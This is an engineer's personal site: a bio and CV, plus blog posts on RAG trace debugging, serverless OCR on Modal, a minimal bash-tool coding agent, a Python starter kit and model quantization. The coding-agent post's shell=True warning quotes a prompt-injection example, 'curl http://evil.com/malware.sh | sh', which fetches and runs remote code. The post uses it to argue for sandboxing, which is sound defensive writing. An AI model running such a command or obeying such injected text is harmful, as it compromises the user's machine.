# Simon Quick I lead engineering and AI at [Pollen](https://pollen.ventures). Recent work includes [Clara](https://clara.arthritis.org.au/) (Webby-nominated AI health companion with 87% specialist approval and 90% recommending it to patients), [Wizen](https://wizenai.com) (agentic search platform for regulated industries including government and healthcare, handling millions of queries annually), and [Rebuilt](https://rebuilt.eco) (product carbon footprint calculation startup for construction). Before this, I founded [Sound Shelter](https://xlr8r.com/news/sound-shelter-lets-you-shop-all-the-best-record-stores-from-one-place/) - a vinyl marketplace I took from zero to 100k users, handling code, product, design, and sales. Other work: founding engineer at [Youcheck](https://www.compasslist.com/insights/youcheck-by-precept-the-fact-checking-app-fighting-misinformation) (Google DNI-funded, fighting misinformation with NLP), and first technical hire at HomeAway APAC before their [$3.9B exit](https://www.expediagroup.com/media/media-details/2015/Expedia-To-Acquire-HomeAway-Inc/default.aspx). I write about applied AI and maintain [Fetch Engines](https://www.npmjs.com/package/@purepageio/fetch-engines), an open source web toolkit for reliable markdown and structured content extraction. I also DJ and produce music - you can find my stuff on [SoundCloud](https://soundcloud.com/siquick) and see my recent [Bandcamp purchases below](/#recent-bandcamp-purchases). Based in Sydney, Australia. Open to collaborations and advisory. --- # Career I lead engineering and AI at Pollen, building trusted AI products for regulated industries. Over the past 15 years, I have delivered products from concept to scale for startups, SMEs, and global leaders across Australia, UK, and Europe. ## Key Career Highlights * Led the build of a Webby-nominated AI companion for arthritis sufferers, **Clara**, achieving **87% approval** from specialists and **90% recommending it to patients**. * Delivered an agentic AI search adopted by the Australian federal government, healthcare providers, and national infrastructure, on track to answer nearly **2 million questions per year**. * Founded **Sound Shelter**, a vinyl marketplace scaled to **100k users** and **30+ partner stores**. * Part-time CTO of **Rebuilt**, Australia’s first self-service platform for generating verified Product Carbon Footprints (PCFs). * Engineered and integrated platforms for **Apple, Vodafone, Expedia, Puma, and CSIRO**. * Founding engineer at **Precept**, awarded **Google DNI funding** to combat online misinformation using NLP. *** ## Experience ### Lead Product Engineer - Pollen *Jan 2022 – Present · Sydney, Australia* I lead the engineering team, shaping technical direction and AI strategy. Promoted from Senior Engineer to Lead in March 2023. #### Selected Achievements * **Clara – AI Companion for Arthritis (Webby-nominated):** Architected and led the build of an iOS/Android/Web app supporting 3.7M Australians with arthritis. Designed a secure RAG pipeline to surface contextual answers, achieving **87% approval** from subject matter experts and **90% specialist recommendation**. Featured on 9News, Sydney Morning Herald, and The Age. * **Agentic AI Search:** Architected and launched a production AI search product, now adopted by the Australian federal government, healthcare providers, and national infrastructure organisations. Handles millions of queries annually with a pipeline including **PII redaction, LLM-as-judge classification, dynamic query rewrite, hybrid semantic/vector search, and LLM summarisation**. * **Rebuilt (Part-time CTO):** Leading technical direction for Australia’s first self-service platform enabling manufacturers to generate and publish verified PCFs. Designed and launched the platform to make trusted carbon data accessible at scale. #### Additional Contributions * Leadership team member driving technical & AI strategy. * Mentored 2 full-time engineers + contractors. * Designed infrastructure across AWS, GCP, Vercel, Expo using IaC (Pulumi). * Built proofs-of-concept for discovery and won multi-million-dollar client projects with technical expertise. **Stack:** TypeScript, Python, React/Next.js, Node.js, Django, Prisma, Postgres, TailwindCSS, React Native/Expo, AWS, GCP, Pulumi, RAG, LlamaIndex, Langfuse, OpenAI, Anthropic *** ### Founder / Engineer - Sound Shelter *Apr 2013 – Jan 2024 · Sydney, Australia* * Built and scaled a vinyl marketplace to **100k users** and **30+ partner stores**. * Designed recommendation algorithms and built infrastructure to pull catalogues via APIs, feeds, and scraping. * Created and launched a native iOS app. **Stack:** React/Next.js, Node.js, Prisma, MySQL, Tailwind, React Native, AWS *** ### Senior Software Engineer - Endeavour *Jan 2020 – Jan 2022 · Sydney, Australia* * Migrated the events platform to React + Django, serving thousands of prospective students. * Built a student onboarding platform used by hundreds per term. * Developed a clinic booking front-end handling hundreds of instant payments weekly. **Stack:** React, Django, Postgres, Tailwind, AWS *** ### Senior Software Engineer - Precept *Aug 2018 – Aug 2019 · Barcelona, Spain* Precept (YouCheck) received Google DNI funding to improve online information environments. * Built backend APIs for ML-driven misinformation detection in text and images. * Led a team of two on a React/Node platform connecting journalists with experts. * Managed DevOps and code review. **Stack:** React, Next.js, Node.js, Python, Django, Google Cloud *** ### Integration Engineer - Partnerize *Dec 2016 – Apr 2018 · Sydney, Australia* * APAC technical lead integrating global clients (Apple, Expedia, Vodafone, Nike, Emirates). * Built custom integrations with third-party APIs for partner marketing infrastructure. * Pre-sales/post-sales consultant on multi-million-dollar deals. **Stack:** Python, MySQL *** ### Sales Engineer - HomeAway.com (Expedia Inc.) *Jul 2012 – Aug 2016 · Melbourne & Sydney, Australia* * First technical hire in APAC. * Built feed parsing infrastructure powering ~20,000 property listings for two years. * Led technical consulting for APAC pre- and post-sales. **Stack:** Python *** ## Technical Skills * **Languages:** TypeScript, JavaScript, Python, SQL * **Front-end:** React, Next.js, React Native, Tailwind * **Back-end:** Node.js, Hono, Express, Django, FastAPI, GraphQL, Prisma, Drizzle, Postgres * **AI:** RAG, Semantic/Hybrid search, Vector databases, Prompt engineering, OpenAI, Anthropic, LlamaIndex, Langfuse, Vercel AI SDK, Agents / Workflows * **Infrastructure:** AWS, Google Cloud, Vercel, Docker, CI/CD *** ## Education **BSc (Hons) Internet Computing** Northumbria University - Newcastle upon Tyne, UK ## Working Rights Australian citizen (dual Australian/UK) --- # How to diagnose RAG failures from traces If a RAG system fails in production, the first question we should be asking is "what broke in this trace?". Until you can answer that, most scorers or dashboards aren't going to help you. In practice, weak RAG systems usually fail in ordinary, inspectable ways. Retrieval misses the governing document. Chunking splits the clause that matters. The model answers from partial evidence and smooths over the gap with fluent prose. This post is a debugging sequence to work out what's going wrong. It starts with one trace, classifies the failure precisely, and only then turns that diagnosis into a metric worth automating. ## About this post If you want the short version, jump to [Failure classes](#failure-classes), [From traces to metrics](#from-traces-to-metrics), and [Default workflow](#default-workflow). The core point is simple: evaluate relationships, not outputs in isolation. For each request, inspect: 1. The question 2. The retrieved evidence 3. The answer Then ask: 1. Did retrieval find the right evidence at all? 2. Was the evidence sufficient to answer fully? 3. Did the answer stay grounded in that evidence? 4. Did the answer resolve the actual user need? 5. Should the system have answered at all? Once you know which relationship broke, the next engineering move is usually obvious. ## Start with one trace The fastest way to make this concrete is to inspect a real failure end to end. Suppose an internal HR assistant gets this question: ***Can part-time employees combine paid parental leave with annual leave, and if so, under what conditions?*** Now look at the top retrieval results from a naive vector search: ```json [ { "rank": 1, "chunk_id": "handbook-112", "source": "employee-handbook.pdf", "score": 0.842, "text": "Annual leave can be taken in blocks or as single days with manager approval. The standard approval process applies to all permanent employees." }, { "rank": 2, "chunk_id": "benefits-041", "source": "benefits-faq.md", "score": 0.801, "text": "The company supports new parents with paid parental leave. Speak to HR if your circumstances are complex." }, { "rank": 3, "chunk_id": "policy-287", "source": "parental-leave-policy.pdf", "score": 0.784, "text": "... employees may take parental leave in multiple blocks subject to operational approval. Requests must be submitted through HRIS ..." } ] ``` And here is the answer the model produces: ***Yes. Part-time employees can combine 12 weeks of paid parental leave with annual leave, subject to manager approval.*** This looks plausible at a glance. That is exactly why trace review matters. The trace exposes three concrete faults: 1. Retrieval never surfaced the clause that defines the paid entitlement for part-time employees. 2. The parental leave chunk is incomplete and does not establish whether annual leave can be combined with paid parental leave. 3. The answer invents `12 weeks`, even though that number never appears in the retrieved evidence. At that point the problem stops being "RAG quality is low" and becomes a bounded pipeline failure. ## Failure classes These six failure classes map cleanly to engineering fixes: | Failure mode | What broke | Typical fix | | ------------------------ | ----------------------------------------------------------------- | ----------------------------------------------------------------- | | Failed recall | The right document never enters the candidate set | Hybrid search, metadata filters, query rewriting, better indexing | | Failed sufficiency | Retrieved chunks are relevant but incomplete | Better chunk boundaries, overlap tuning, follow-up retrieval | | Failed grounding | The answer contains unsupported claims | Tighter prompts, structured generation, grounded judges | | Failed response adequacy | The evidence is present but the answer misses the actual question | Better answer planning, explicit response templates | | Unanswerable question | The corpus cannot support a confident answer | Refusal policy, escalation path, answerability checks | | Broken citations | Citations exist but do not support the claims they annotate | Span-level citation checks, stricter source mapping | The value of this taxonomy is operational. Each class points to a different part of the stack. In practice, a single trace may contain more than one failure mode. The taxonomy is a debugging aid - production failures don't generally arrive one at a time. Difficult cases still need domain judgement, especially when the dispute is about interpretation rather than retrieval. ## Retrieval first The first question is blunt: did retrieval bring back the evidence required to answer the question? In the HR trace, the answer is no. The chunks are on topic, but "on topic" is not the same as "sufficient to answer". That distinction matters more than most teams admit. In policy-heavy systems, the relevant unit is often the document or section, not the individual chunk. A highly ranked fragment can still be insufficient if the governing exception sits two pages later or in the next table. For first-pass retrieval, **Recall@k** is usually the first metric that matters. You want to know whether the governing source entered the candidate set at all. Once recall is acceptable, ranking quality matters more and **Precision@k**, **MRR**, and **NDCG@k** become useful. > \[!note] **Retrieval metrics explained** > > **Recall@k**: The proportion of queries where at least one truly relevant result appears in the top *k*. Use this first to check whether retrieval is even surfacing the governing source. > > **Precision@k**: The proportion of the top *k* results that are relevant. This tells you how much noise you are feeding into generation. > > **MRR**: Mean Reciprocal Rank - averages `1 / rank` for the first relevant result. It rewards systems that place the first useful source near the top. > > **NDCG@k**: Normalised Discounted Cumulative Gain at *k* - scores ranking quality when relevance is graded, giving more credit to highly relevant items near the top. If retrieval is weak, generation metrics are mostly decorative. You cannot prompt your way out of missing evidence. Typical retrieval fixes are not glamorous: * Hybrid search instead of vectors alone * Metadata filters for policy type, version, region, or employee class * Better chunk boundaries around tables, clauses, and exceptions * Query rewriting for short or ambiguous questions * Reranking that prefers primary documents over generic summaries ## Groundedness next Once retrieval is reasonable, check whether the answer stayed inside the evidence it was given. This is a groundedness question, not a correctness vibe check. In a source-grounded system, a claim is unsupported if the retrieved evidence does not back it. It does not matter whether the model guessed correctly from pretraining. In the example trace, `12 weeks` is an unsupported claim. That is the failure. This is the smallest structured output you should use to evaluate it: ```python from pydantic import BaseModel class GroundingEval(BaseModel): is_supported: bool supporting_quotes: list[str] unsupported_claims: list[str] ``` Minimal judge prompt: ```text You are evaluating whether an answer is supported by retrieved evidence. Given the user question, the retrieved chunks, and the answer, return JSON matching GroundingEval. Only mark a claim as supported if a quoted span from the retrieved chunks directly supports it. List every important unsupported claim explicitly. ``` Example judge output: ```json { "is_supported": false, "supporting_quotes": [ "Annual leave can be taken in blocks or as single days with manager approval.", "Employees may take parental leave in multiple blocks subject to operational approval." ], "unsupported_claims": [ "Part-time employees can combine paid parental leave with annual leave.", "Part-time employees receive 12 weeks of paid parental leave." ] } ``` This is far more useful than a generic faithfulness score because it tells you what failed and why. ## Sufficiency matters A lot of teams collapse relevance and sufficiency into one fuzzy concept. That loses an important distinction. Recall fails when the right source never enters the candidate set. Sufficiency fails when it does enter, but arrives incomplete for the task. Evidence can be relevant and still be insufficient. In the HR trace, we have a partial annual leave rule, a vague FAQ, and a clipped policy chunk. That is related material. It is not enough to support the answer. This is the structured output for that check: ```python from pydantic import BaseModel class SufficiencyEval(BaseModel): has_enough_evidence: bool missing_facts: list[str] follow_up_queries: list[str] ``` Example output: ```json { "has_enough_evidence": false, "missing_facts": [ "The paid parental leave entitlement for part-time employees.", "Whether annual leave can be combined with paid parental leave.", "Any approval or sequencing constraints for combining the two leave types." ], "follow_up_queries": [ "part-time parental leave entitlement site:intranet.company policy pdf", "combine annual leave with parental leave site:intranet.company policy pdf" ] } ``` When this check fails repeatedly, model changes are usually the wrong first response. Query rewriting, chunk overlap, and source selection are higher leverage. ## Response adequacy failures An answer can be grounded and still fail. This happens when the system retrieves useful evidence, stays faithful to it, and then answers a nearby question instead of the actual one. Here is a simple example: ```text Question: "Can contractors expense home office equipment, and if so, is manager approval required?" ``` ```json [ { "chunk_id": "expense-014", "source": "contractor-expense-policy.pdf", "text": "Contractors may expense approved home office equipment up to $500 per quarter." }, { "chunk_id": "expense-018", "source": "contractor-expense-policy.pdf", "text": "All contractor equipment expenses require prior manager approval and a receipt." } ] ``` ```text Answer: "The contractor expense policy covers home office equipment and sets a $500 quarterly limit." ``` That answer is grounded. It is also inadequate, because it dodges the question about manager approval. In practice, use one blunt check: **After reading the user’s question and the response, would a reviewer say the response fully answered the question?** If not, the system has a response adequacy failure. ## Refusal quality Sometimes the correct answer is no answer. If the evidence is insufficient, the system should refuse to answer confidently. In high-trust systems that is not a broken outcome. It is the correct outcome. Model that explicitly: ```python from pydantic import BaseModel class AnswerabilityEval(BaseModel): should_answer: bool reason: str safest_next_step: str ``` The hard part is not the schema. The hard part is the UX. Bad refusal: **I do not know.** Better refusal: **I cannot find a policy that confirms whether part-time employees can combine paid parental leave with annual leave. I found the general annual leave policy and part of the parental leave policy, but neither answers that specific point. If you need a definitive answer, HR should confirm it. I can link the relevant policy documents if useful.** Good refusal UX does three things: 1. It says what is missing. 2. It names the closest relevant evidence that was found. 3. It routes the user to the next useful action. That is how you fail without bluffing. ## Citation checks If your system emits citations, evaluate the citations themselves. A citation is only useful if it supports the claim it is attached to. It is easy to build a system that looks trustworthy because every sentence has a source badge beside it, while the underlying evidence chain is weak. In the HR trace, citing the annual leave clause beside the claim about `12 weeks of paid parental leave` would still be a citation failure. The badge is present. The support is not. This is the structured output to use: ```python from pydantic import BaseModel class CitationCheck(BaseModel): sentence: str chunk_ids: list[str] supporting_quotes: list[str] is_supported: bool class CitationEval(BaseModel): citations: list[CitationCheck] ``` Example output: ```json { "citations": [ { "sentence": "Part-time employees can combine 12 weeks of paid parental leave with annual leave.", "chunk_ids": ["handbook-112", "policy-287"], "supporting_quotes": [], "is_supported": false } ] } ``` That gives you something much more useful than "citations were present". It lets you verify whether each important sentence mapped to the exact evidence that justifies it. Sentence-level checks are usually a practical approximation, not a perfect standard. Some claims are distributed across multiple sentences or require multi-hop support across more than one source. ## Runtime versus offline Do not assume every eval belongs in the request path. For most products, these checks should run asynchronously on logged traces. The user gets the response, the trace is stored, and eval workers score groundedness, sufficiency, citations, and refusal quality afterwards. That is the right default for most support, search, and internal knowledge tools because it avoids turning one user request into three extra model calls. There are exceptions. In medical, legal, financial, or other high-trust flows, a synchronous sufficiency or answerability gate can be worth the latency because the cost of an unsupported answer is higher than the cost of waiting longer. The distinction is simple: * Runtime checks are guardrails * Asynchronous checks are diagnostics and regression metrics If you blur those together, you either ship a slow product or a blind one. ## From traces to metrics Trace review and dashboards are not competing ideas. They are stages in the same workflow. You also need a real place to inspect traces. In production that usually means an observability stack rather than terminal logs. [LangSmith](https://www.langchain.com/langsmith-platform), [Langfuse](https://langfuse.com/) and [Braintrust](https://www.braintrust.dev/) are obvious managed options. [Phoenix](http://phoenix.arize.com/) is a good open-source choice for local iteration. If your broader telemetry already lives in Datadog, keeping LLM traces beside application signals is often good enough. The tool matters less than the data shape. For each request, we want: * One trace per run * Spans for retrieval and model calls * Retrieved chunk IDs * Prompt inputs * Outputs * Latency * Eval results attached to the same run This is the lifecycle to use: 1. Review 30 to 50 traces manually. 2. Cluster the failures into a small set of repeatable modes. 3. Write targeted structured evals for those exact modes. 4. Validate those evals against a human-labelled set. 5. Put the validated evals on a dashboard and watch for regressions across retrieval, prompt, or model changes. If you skip straight to the dashboard, you usually end up with generic scores that correlate weakly with the thing you care about. If you start with traces, the automated metric has a job to do. ## Evaluate the judge LLM-as-a-judge is useful. It is not ground truth. Judges are useful because they scale a rubric, not because they replace human judgement. Every eval encodes an operational preference about what you want the system to do. Before you trust a new judge on thousands of traces, test it against a human baseline: 1. Label 100 traces by hand. 2. Compare the judge output with the human labels. 3. Inspect where it disagrees and why. 4. Tighten the rubric, schema, or examples until the judge is reliable enough for the job. If your grounding judge misses obvious unsupported claims, do not put it on a dashboard and call it science. Fix the judge first. ## Default workflow The default flow is straightforward: 1. Start with one trace, not one dashboard. 2. Separate recall, sufficiency, grounding, response adequacy, answerability, and citation failures. 3. Fix retrieval before generation whenever the evidence is missing or incomplete. 4. Treat unsupported claims as the primary unit of failure. 5. Run most evals asynchronously, and reserve runtime gates for higher-trust flows. 6. Validate every judge against human labels before using it as a regression metric. That sequence is what stops RAG evaluation turning into metric collection without diagnosis. *** *Photo by Alexander Lyashkov on Unsplash* --- # Deploying GLM-OCR as a Serverless GPU API on Modal I put together a small repo that deploys [`GLM-OCR`](https://huggingface.co/zai-org/GLM-OCR) to [Modal](https://modal.com/) as a PDF-to-Markdown API. The goal was simple. I wanted something open, fairly compact, and easy to drop into an LLM ingestion pipeline without pulling in a pile of extra infrastructure. `GLM-OCR` turned out to be a good fit, and Modal makes it very easy to expose it as a public GPU-backed endpoint. ## Here for the code? The repo is [here](https://github.com/siquick/glm-ocr-modal). ## What's happening There are plenty of OCR tools around, but I wanted something small and hackable. `GLM-OCR` is a compact document OCR model that works through `transformers` and can produce structured text from page images without much fuss. The deployment side is equally minimal. It is just a FastAPI app and a Modal GPU class. The endpoint accepts a PDF, the worker renders each page to an image, runs OCR, and returns the result as Markdown. ## The shape of the code The request flow is straightforward: 1. `POST` a PDF to `/parse` 2. render the PDF pages with `pypdfium2` 3. send each page image to `GLM-OCR` 4. return the result as Markdown You can hit it with `curl` like this: ```sh curl -X POST "https:///parse" \ -F "pdf=@/absolute/path/to/file.pdf" ``` The nice part is how little code you need around the model itself. The worker loads `GLM-OCR` once, and the API calls it remotely: ```python @app.cls( image=inference_image, gpu="L40S", volumes={MODEL_CACHE_PATH: hf_cache_volume}, ) class GlmOcrService: @modal.enter(snap=True) def load(self) -> None: from transformers import AutoModelForImageTextToText, AutoProcessor self.processor = AutoProcessor.from_pretrained(MODEL_NAME) self.model = AutoModelForImageTextToText.from_pretrained( pretrained_model_name_or_path=MODEL_NAME, torch_dtype="auto", device_map="auto", ) ``` You still write normal Python functions and classes, but end up with a public serverless GPU service. ## Why Modal works well for this Modal suits bursty workloads like PDF processing that do not need to sit online all day. In this setup I am using: * a FastAPI endpoint for uploads * an `L40S` GPU worker * a persisted Hugging Face cache so the model weights do not need to be pulled every time * scale-to-zero after about a minute of inactivity That gives you a proper hosted OCR API without managing a VM, Kubernetes, or a permanently warm GPU. ## Observed performance The useful bit is end-to-end behaviour, not just model-card numbers. In my quick tests with a 4-page PDF: * **cold start:** `26.08s` * **warm start:** `17.98s` * **warm start:** `18.17s` So in practice that looks like: * roughly **8 seconds** of cold-start overhead * then about **4.5 seconds per page** once the worker is warm That is slower than raw model benchmark figures, but those are measuring something different. Here you are timing the whole request path: request handling, PDF rasterisation, image preparation, OCR, and Markdown assembly, plus cold start where relevant. ## You can do this for almost free As of **20 March 2026**, Modal’s Starter plan includes **$30/month** in compute credits. This repo uses an `L40S`, currently priced at **$0.000542/sec**, or about **$1.95/hour**. That works out to roughly **15.4 hours** of GPU runtime per month before you pay anything beyond the included credit. So you can deploy a real OCR API backed by a proper GPU, keep the codebase small, and experiment without the cost becoming its own project. *Cover photo by Brett Jordan on Unsplash* --- # How to build a Minimal Viable Coding Agent (MVCA) Coding agents are everywhere, most of us are using them, and they produce many moments of magic. But under the surface there may be less going on than you think. This post is about what it takes to build a minimal viable coding agent in ~100 lines of code. ## Here for the code? View the repo [here](https://github.com/siquick/mvp-coding-agent) ## Agent in action (running against the repo) ```sh $ safehouse python agent.py > In 20 words, what is this repo about? Tool bash_tool called Tool bash_tool called Tool bash_tool called Tiny CLI coding agent using OpenAI responses API and bash tool; tracks history, runs commands, warns about sandbox safely recommended. > What model does it use? It uses the `gpt-5.1-codex-mini` model via OpenAI’s newer `responses` API. > Change the model to gpt-5-mini Tool bash_tool called Tool bash_tool called Tool bash_tool called Tool bash_tool called Tool bash_tool called Updated `agent.py` to request `gpt-5-mini` instead of `gpt-5.1-codex-mini` for both initial and follow-up Responses API calls. (No tests were run.) > Change it back Tool bash_tool called Tool bash_tool called Reverted `agent.py` to use `gpt-5.1-codex-mini` for both the initial and follow-up OpenAI Responses API calls as originally configured. Tests were not run (not requested). > ``` ## An agent is really just a loop At the most basic level, an agent takes an input and keeps performing tasks using the tools made available, in a loop, until a model decides that the task is complete. A coding agent, or practically any agent, really only needs three things: * A model to make decisions * A list of tools * A loop ### The model Cost vs latency vs capability is always the trade-off you need to decide on when choosing a model. Unless you're planning for complex work, which this MVCA is not, then you can use a fairly small model, preferably one trained specifically for code rather than a general purpose model. I went with [OpenAI Codex 5.1 Mini](https://developers.openai.com/api/docs/models/gpt-5.1-codex-mini), but could have just as easily used [Qwen3 Coder Next](https://openrouter.ai/qwen/qwen3-coder-next). ### The tools I originally had individual tools for `read_file` and `write_file`, but came to the conclusion that `bash` can do everything I'd need for now: Edit files? use `sed`\ Search through files? use `grep`\ List file content? use `cat` In the repo this is implemented as a single `bash_tool`, with a small Pydantic schema and a `subprocess.run(...)` executor. ```python from pydantic import BaseModel import subprocess class BashToolArgs(BaseModel): """execute shell commands""" command: str def execute_bash_tool(args: BashToolArgs): try: result = subprocess.run( # Note - never use shell=True in production - see below args.command, shell=True, capture_output=True, text=True, timeout=60 ) output = result.stdout + result.stderr return output if output.strip() else "(no output)" except Exception as e: print(f"Error: {e}") bash_tool = { "type": "function", "name": "bash_tool", "description": "Execute shell functions like `sed`, `cat`, `grep`", "parameters": BashToolArgs.model_json_schema(), } tools = [bash_tool] ``` > **The Sandbox Route** > To keep the agent minimal but safe, we have to isolate it. Using Safehouse, Docker containers, or E2B (a popular cloud sandbox for agents) is the standard way to run LLM-generated bash code safely, allowing us to keep shell=True without risking our host machine. > \[!note] **Why use Pydantic?** > > Strictly speaking, I do not need Pydantic for a tool this small. `bash_tool` only takes a single `command: str`, so I could have parsed the JSON myself. > > I used Pydantic because it gives me two useful things for almost no extra code. First, it validates the arguments the model sends before I execute anything. Second, it can generate the JSON schema for the tool automatically via `BashToolArgs.model_json_schema()`. > > That means the same class defines both the contract the model sees and the shape my Python code expects. In a larger agent, it becomes more important because tool arguments grow quickly and hand-written schemas become tedious to maintain. ### The loop This is just two `while` loops: one for the user input, and one for the agent to iterate through tool calls until it has achieved its objective. There are two details in the implementation worth calling out. The first is `max_turns = 10`, which puts a hard limit on how many tool iterations the agent can take before it gives up. The second is that follow-up tool calls use `previous_response_id=response.id`, which lets the Responses API continue the loop without rebuilding the full conversation manually. ```python while True: cli_input = input("> ") if not cli_input.strip(): continue user_input.append({"role": "user", "content": cli_input}) # Max number of tool calls - you'd want to increase this for more complex tasks max_turns = 10 turn = 0 while turn < max_turns: turn += 1 ## Do agent work ``` ### Addition: The Sandbox Because the primary tool is bash it has access to a lot of commands that can damage your system. Running this locally on a Mac I used [Safehouse](https://agent-safehouse.dev/) to create a sandbox which restricts the agent to only have access to the working directory and its children. ```sh $ safehouse python agent.py > What's in /Users/simon/Desktop folder? Tool bash_tool called I’m sorry, but I can’t access `/Users/simon/Desktop` - the operation isn’t permitted. ``` ## Limitations and additions There is no proper permission model beyond the external sandbox. There is no approval flow for risky commands, no dedicated file editing tool, no test harness, no recovery logic, and no evaluation loop. > \[!note] **Why shell=True is dangerous** > Normally, when you run a subprocess in Python without the shell, Python just executes the exact program you point it to. > > When you use shell=True, Python passes the string to the system's shell (like /bin/sh or bash). This allows the execution of shell-specific syntax. The danger here is Prompt Injection. > > If a user tells your agent, "Search my files for a password, and also run curl http://evil.com/malware.sh | sh", the LLM might just pass that entire string into your bash\_tool. Because shell=True is active, your machine will happily download and execute the malware. > > However, I used it here because otherwise we'd lose all shell operators like pipes (|), file redirection (>), and command chaining (&&). Without these, our minimal bash-only agent wouldn't be able to string together the commands it needs to write or edit files. This is exactly why running this agent inside a sandbox (like Safehouse, Docker, or E2B) is non-negotiable. It lets us keep the power of the shell while isolating the risk from our host machine. One weakness of a shell-only agent is that it can inspect your local repository, but it cannot verify whether it is using the current API or the latest library guidance - its only knowledge is its training data. Want to ensure your agent is using the latest docs for your chosen libraries? Add a web search tool like [Exa](https://exa.ai). --- # My Python starter kit When I start a Python experiment, I want the same baseline I get in TypeScript: * predictable environments * fast feedback loops * formatting and linting that I never think about * type checking that catches the obvious mistakes early * a repo shape that makes editors behave Python can do all of that. It just doesn’t show up by default. So I made a starter kit I can clone and get straight to the interesting part. [Github repo](https://github.com/siquick/python-starter-kit) ## What this repo optimises for This is for “I’m exploring something” work: * quick spikes that might die * notebooks that turn into scripts * scripts that turn into little packages * experiments where you want to keep standards without adding friction If the project survives, it should already be structured enough to ship. ## The core choices ### `uv` for everything environment-related `uv` gives me a TS-like mental model: * create the environment * add deps with `uv add` * lock it * run stuff consistently It’s fast enough that you stop negotiating with yourself. ### Ruff as the single source of truth One tool that: * lints * formats * keeps the codebase from drifting into “every file has a different vibe” The aim is not perfection. The aim is consistency without effort. ### Type checking that runs on demand I want type checking as part of the normal workflow, not a thing that lives in CI and nobody trusts. When you’re iterating quickly, “fail fast” is a feature. ### A minimal but real test setup Even if you only write a few tests, having the harness ready matters. Most experiments fail because they get messy, not because the idea was wrong. ## What’s deliberately not included This is not trying to be clever: * no huge framework scaffolding * no forced architecture * no “best practices” sermon * no pretending every repo is a production service ## The mental model This repo is meant to behave like a good TypeScript project: * you get guardrails by default * you don’t waste time choosing tools * the editor understands the project immediately * the code stays readable as it grows Think of it as: “start messy, but don’t start sloppy”. ## How I use it * clone with [degit](https://github.com/Rich-Harris/degit) * setup a venv and sync `uv venv .venv && uv sync` * `uv add` whatever I need * write code immediately That’s it. --- # A guide to model quantization in fine-tuning (and how to pick the right GGUF) ## About this post Fine-tuning with [Unsloth](https://unsloth.ai) and [Axolotl](https://axolotl.ai/) is, on the whole, a well thought-out experience where a lot of the complexity is handled for you. However one area that consistently trips people up is quantization, specifically which quant to pick when you export and save a newly trained model. The aim of this post is to give you a simple mental model you can reuse when you have to make a quantization decision, along with a short overview of the common quant methods in Unsloth and how “Hugging Face models”, merged 16-bit checkpoints, and GGUF exports relate to each other. While I'm using Unsloth in many of the examples, this logic applies to any LoRA fine-tune (Axolotl, TRL, etc). ## Only here for the quants? The next few sections are a relatively low-level explanation of quantization. If you are just looking for details on the available quants and how to pick one then jump to the [Common GGUF quantization options](#common-gguf-quantization-options) section or [Putting it all together](#putting-it-all-together) section. > \[!note] **Note on Server-Side Deployment (vLLM/TGI)** > This guide focuses on **GGUF**, which is the standard for local deployment (Ollama, LM Studio, Laptops). > > If you are deploying to high-end NVIDIA GPUs via vLLM, you typically have two choices: > > * FP16: The merged checkpoint discussed below. Best quality, highest VRAM usage. > * AWQ/GPTQ: Specialised formats for NVIDIA GPUs. If you need these, the "Mental Model" section below still applies (Training → Merged → Quant), but you will swap GGUF for AWQ in the final step. ## What is quantization? Quantization is the act of compressing model weights to fewer bits to save memory and bandwidth, at some quality cost. In practice, you take weights that are stored in high-precision floats, for example 16 or 32-bit, and map them into a much smaller set of allowed values, for example 8, 6, or 4-bit integers. Think of it like rounding from microseconds to milliseconds. You keep the overall timing but lose the tiny details that don't often matter. ### What Quantization changes under the hood Quantization reduces the precision of the model weights so the runtime can load fewer bytes and perform cheaper operations. A GGUF file is the same set of tensors the model was trained with but each tensor has been compressed into lower-bit representations with additional scaling metadata so the runtime can reconstruct approximate values at inference time. #### Weight quantization Transformer layers contains large FP16 (16-bit floating point) matrices. Quantization converts each matrix into: * Low-bit integer blocks (e.g. 4-bit, 6-bit, 8-bit values) * Per-row or per-channel scale factors (tiny volume knobs that rescale each row or channel back to the right loudness after compression) that let the runtime map integers back to approximate floating-point ranges. * Optional clustering codebooks (the "K" schemes) that store centroids and index codes, improving fidelity at lower bit-rates. Lower bit-rates shrink the file and increase throughput, but introduce quantization noise - small distortions in the weight matrices. Bigger models absorb this noise more gracefully whereas small models lose capacity quickly. #### What quantization does not change * Weights are quantized. * Activations (the temporary values a model produces while thinking, like notes written on scrap paper during a calculation) and KV caches remain FP16/FP32 unless the runtime adds seperate KV-cache quantization (a different optimisation entirely). * The model's architecture, vocabulary, context window, and training data remain unchanged. So quantization is therefore a deployment-time tradeoff. We accept approximation error in return for lower memory, lower latency, and cheaper inference. During inference, transformer models build a key–value cache: a running memory of all previous tokens. This cache is stored at full precision (FP16/FP32) in almost every runtime because it changes on every new token. Think of it as the model’s scratchpad while it generates text. Quantization in GGUF does not reduce the size of this cache, because only the static model weights are compressed. Some runtimes offer separate KV-cache quantization, which trades a small drop in generation quality for lower memory use and faster long-sequence decoding, but this is independent of weight quantization. > \[!note] **A note on KV caches** > During inference, transformer models build a key–value cache: a running memory of all previous tokens. This cache is stored at full precision (FP16/FP32) in almost every runtime because it changes on every new token. Think of it as the model’s scratchpad while it generates text. Quantization in GGUF does not reduce the size of this cache, because only the static model weights are compressed. Some runtimes offer separate KV-cache quantization, which trades a small drop in generation quality for lower memory use and faster long-sequence decoding, but this is independent of weight quantization. ### Quantization in Unsloth When exporting or saving models with Unsloth, you will encounter several seemingly unrelated options: * `4-bit QLoRA` * `save_pretrained_merged(..., "merged_16bit")`, * GGUF quant methods such as `q8_0` or `q4_k_m` These sit at different points in the model lifecycle and are easy to confuse. Unsloth intentionally keeps the underlying theory out of scope, which makes the surface area appear more abstract than it is. The rest of this post untangles these formats, explains how they relate, and provides a simple mental model for choosing the right quant depending on model size, hardware, and workload. ## A simple mental model for model formats You can think in three stages when you're training and fine-tuning a model: **Training -> merged Hugging Face checkpoint -> deployment quant** ### Training During the training phase, we are not choosing our deployment quants, but we *are* choosing how the base model is loaded into memory. In practice this means choosing the data type (dtype) for the weights, for example 4-bit, 8-bit or 16-bit. In Unsloth this is configured with the `load_in_4bit` and `load_in_8bit` options: ```python # Loading a model in Unsloth from unsloth import FastLanguageModel import torch model, tokenizer = FastModel.from_pretrained( model_name = "unsloth/gemma-3-12b-it", max_seq_length = 4096, load_in_4bit = True, load_in_8bit = False, ) ``` Both of these options control how the base weights are represented in GPU memory during training. `load_in_4bit` This loads the base model in 4-bit quantized format (QLoRA style). This cuts VRAM use significantly so you can fine tune larger models on smaller GPUs with less VRAM, while keeping the base weights frozen and only training LoRA adapters. 